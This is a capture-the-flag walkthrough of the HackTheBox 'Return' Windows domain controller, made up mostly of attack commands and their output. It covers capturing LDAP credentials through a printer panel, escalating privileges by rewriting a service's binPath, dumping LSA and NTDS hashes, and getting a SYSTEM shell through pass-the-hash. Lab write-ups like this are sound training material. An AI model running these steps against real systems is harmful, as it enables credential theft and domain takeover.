Return
AD box on HTB.
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.148.204
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-09 20:04 +03
Nmap scan report for 10.129.148.204
Host is up, received echo-reply ttl 127 (0.22s latency).
Scanned at 2025-09-09 20:04:39 +03 for 222s
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-09 17:23:55Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windowsWe have multiple open ports that indicate active directory domain controller, we have also http on port 80.
We can get the machine name and the domain using netexec as well:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ netexec smb 10.129.148.204
SMB 10.129.148.204 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)So I will add the machine IP and the FQDN to the hosts file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.148.204 PRINTER.return.local return.local PRINTERLets open up return.local with firefox:
Pages other than settings redirect us to the same page.
Exploitation:
What do we have on the settings page:
We can launch burpsuite, and click on the update button to see how the request will go to the web server:
Its post request, and other parameters were not specified.
Lets send this request to repeater, and try to play with that ip parameter:
I tried to see if it connects back to us with python web server on port 80, but nothing happened, going back to the settings.php page, we will find the server port is 389 which is ldap.
We can start responder to listen for any ldap traffic:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ sudo responder -I tun0 -dvw
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON] SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.4]
Responder IPv6 [dead:beef:4::1002]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-2K33M3WIHK7]
Responder Domain Name [Y37M.LOCAL]
Responder DCE-RPC Port [47845]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events... 
[LDAP] Attempting to parse an old simple Bind request.
[LDAP] Cleartext Client : 10.129.148.204
[LDAP] Cleartext Username : return\svc-printer
[LDAP] Cleartext Password : 1edFg4******
[+] Exiting...Here we got ldap credentials.
We can capture it via netcat as well:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ nc -nlvp 389
listening on [any] 389 ...
connect to [10.10.16.4] from (UNKNOWN) [10.129.148.204] 54224
0*`%return\svc-printer
1edFg4******Shell as svc-printer:
We can check if svc-printer has any remote access:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ netexec winrm printer.return.local -u svc-printer -p '1edFg4******'
WINRM 10.129.148.204 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 an
d will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.148.204 5985 PRINTER [+] return.local\svc-printer:1edFg4****** (Pwn3d!)We will see that we have remote access using WinRM.
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ evil-winrm -i 10.129.148.204 -u svc-printer -p '1edFg4******'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents>Post-Exploitation:
Abuse Server Operators group:
Lets check our privileges:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all 20:43:01 [321/334]
USER INFORMATION
----------------
User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.We are members of the Print Operators group, combined with SeLoadDriverPrivilege, this can allow us to load a vulnerable driver and exploit it.
We can see that we are member of Server Operators group, which will grant us with SeBackupPrivilege, and SeRestorePrivilege privileges.
Also this group grants us with some server modification capabilities.
So we can for example change binpath of a service running with high privileged user to add svc-printer user to the local administrators group:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> services
Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvcWe can for example chnage the binpath of vmtools, we can see besides it under privileges column it says true as well:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VMTools binPath="net localgroup administrators svc-printer /add"
[SC] ChangeServiceConfig SUCCESSBefore restarting the service lets check the administrators local group:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.
Stop and start that service:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop VMTools
SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start VMTools
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.It throwed an error, but if we checked the administrators local group:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
svc-printer
The command completed successfully.We will see that we are now part of that group.
Dump the secrets:
What we can do now is to dump secrets for example, sam, lsa, etc.
I will use netexec to help us with this:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ netexec smb printer.return.local -u svc-printer -p '1edFg4******' --lsa
SMB 10.129.148.204 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.129.148.204 445 PRINTER [+] return.local\svc-printer:1edFg4****** (Pwn3d!)
SMB 10.129.148.204 445 PRINTER [+] Dumping LSA secrets
SMB 10.129.148.204 445 PRINTER RETURN\PRINTER$:aes256-cts-hmac-sha1-96:701e48cb390a55cb1fcb814b9b4f59ad135f2904e8e0e78d8391f77cd13d****
SMB 10.129.148.204 445 PRINTER RETURN\PRINTER$:aes128-cts-hmac-sha1-96:5fc0305293df0099525728a3a0a0f9ef
SMB 10.129.148.204 445 PRINTER RETURN\PRINTER$:des-cbc-md5:1ca204918a2a6226
SMB 10.129.148.204 445 PRINTER RETURN\PRINTER$:plain_password_hex:5ddbb4747a7f0339488ec50284f01f7f3790e4371bf48777832a85073d7968454967fb7539ba4012404fe64f084614e76297163be08a9f28ae54e76351bc0de8acf09ee1a0100dde87afd9831ff9613e3131430e9b05f2b252b8580afb0a7fb6af1929377c62c5bba527f0832c916fc330ba638bb572cbe9da532c04882f55448b1bfef43c143fd3631063cd32378374d90f97e96a8a62ee4b5e2666fc042d5c36e06e290655a62d3553e0b278de7c8e02560409942352345e15f825497a8b9c245b98ba3acc7a67848a18189e0f835c0addd1837dee0f0124eec557472dfc6fd11d6af67cb20bf61916c8941bbac32e
SMB 10.129.148.204 445 PRINTER RETURN\PRINTER$:aad3b435b51404eeaad3b435b51404ee:ba0cf7a0c94a04c0****************:::
SMB 10.129.148.204 445 PRINTER dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
SMB 10.129.148.204 445 PRINTER [+] Dumped 6 LSA secrets to /home/kali/.nxc/logs/lsa/PRINTER_10.129.148.204_2025-09-09_222117.secrets and /home/kali/.nxc/logs/lsa/PRINTER_10.129.148.204_2025-09-09_222117.cached
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ netexec smb printer.return.local -u printer$ -H ba0cf7a0c94a04c0**************** --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n]
SMB 10.129.148.204 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.129.148.204 445 PRINTER [+] return.local\printer$:ba0cf7a0c94a04c0****************
SMB 10.129.148.204 445 PRINTER [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.129.148.204 445 PRINTER [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.148.204 445 PRINTER Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1****************:::
SMB 10.129.148.204 445 PRINTER Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931****************:::
SMB 10.129.148.204 445 PRINTER krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add3****************:::
SMB 10.129.148.204 445 PRINTER return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246****************:::
SMB 10.129.148.204 445 PRINTER PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:ba0cf7a0c94a04c0****************:::
SMB 10.129.148.204 445 PRINTER [+] Dumped 5 NTDS hashes to /home/kali/.nxc/logs/ntds/PRINTER_10.129.148.204_2025-09-09_222513.ntds of which 4 were added to the database
SMB 10.129.148.204 445 PRINTER [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.129.148.204 445 PRINTER [*] cat /home/kali/.nxc/logs/ntds/PRINTER_10.129.148.204_2025-09-09_222513.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.129.148.204 445 PRINTER [*] grep -iv disabled /home/kali/.nxc/logs/ntds/PRINTER_10.129.148.204_2025-09-09_222513.ntds | cut -d ':' -f1We can now use that administrator ntlm hash to authenticate to the target machine as him:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return] 20:56:39 [61/88]
└─$ impacket-psexec return.local/administrator@10.129.148.204 -hashes :32db622ed9c00dd1****************
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.148.204.....
[*] Found writable share ADMIN$
[*] Uploading file rOqKosif.exe
[*] Opening SVCManager on 10.129.148.204.....
[*] Creating service yhCC on 10.129.148.204.....
[*] Starting service yhCC.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
printer
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::fc21:a949:71d3:32b5
Link-local IPv6 Address . . . . . : fe80::fc21:a949:71d3:32b5%10
IPv4 Address. . . . . . . . . . . : 10.129.148.204
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%10
10.129.0.1We can also read the flags:
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
84ebbe6b63a6319a****************
C:\Windows\system32> type C:\Users\svc-printer\Desktop\user.txt
19119e2dab6f9a64****************Last updated